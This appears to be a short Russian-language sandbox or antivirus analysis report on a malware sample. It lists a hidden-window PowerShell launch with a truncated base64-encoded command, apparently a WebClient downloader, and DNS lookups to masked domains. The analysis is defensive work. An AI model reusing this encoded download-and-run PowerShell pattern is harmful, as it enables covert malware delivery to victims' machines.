Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABTAF8ANAA3ADcAOAAzADIAPQAoACcAdgBfADYAOAAnACsAJwA3ACcAKwAnAF8AJwApADsAJABTADcAXwA1ADUANQBfAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAHcANwA5AF8ANgA4ADgAPQAoAC...
- DNS ASK de####erforhad.com
- DNS ASK co###yres.com
- DNS ASK it##.#frn.edu.br
- DNS ASK ic####tikepppni.org
- DNS ASK ef##ur.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABTAF8ANAA3ADcAOAAzADIAPQAoACcAdgBfADYAOAAnACsAJwA3ACcAKwAnAF8AJwApADsAJABTADcAXwA1ADUANQBfAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAHcANwA5AF8ANgA4ADgAPQAoAC...' (со скрытым окном)